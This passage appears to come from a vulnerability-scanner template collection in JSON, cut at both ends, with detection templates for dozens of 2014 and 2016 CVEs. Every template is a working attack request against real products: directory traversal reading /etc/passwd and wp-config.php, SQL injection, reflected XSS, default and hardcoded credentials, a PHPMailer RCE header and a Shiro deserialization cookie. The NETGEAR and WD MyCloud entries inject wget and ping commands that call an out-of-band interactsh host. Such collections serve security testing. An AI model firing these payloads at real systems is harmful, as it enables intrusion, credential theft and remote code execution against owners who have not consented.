}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET 